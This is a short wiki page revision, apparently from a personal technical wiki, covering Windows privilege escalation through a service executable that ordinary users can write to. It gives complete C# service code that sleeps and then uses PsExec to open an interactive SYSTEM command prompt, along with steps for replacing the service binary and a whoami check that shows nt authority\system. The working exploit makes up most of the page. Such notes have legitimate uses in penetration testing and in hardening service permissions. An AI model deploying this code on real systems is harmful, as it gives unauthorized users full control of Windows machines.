« Privilege escalation » : différence entre les versions

De Banane Atomic
Aller à la navigationAller à la recherche
Ligne 4 : Ligne 4 :


<filebox fn='Program.cs'>
<filebox fn='Program.cs'>
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new Service() });
    }
}


public class Service : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(240000);
        Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
    }
}
</filebox>
</filebox>


Version du 11 février 2022 à 18:06

With a writable Windows service

If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.

Program.cs 
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new Service() });
    }
}

public class Service : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(240000);
        Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
    }
}
  1. Replace the executable of the Windows service by the compiled application.
  2. A command prompt will be launched when the Windows service starts.
Dos.svg 
whoami
REM nt authority\system
Récupérée de « http://wiki.bananeatomic.fr/index.php?title=Privilege_escalation&oldid=26777 »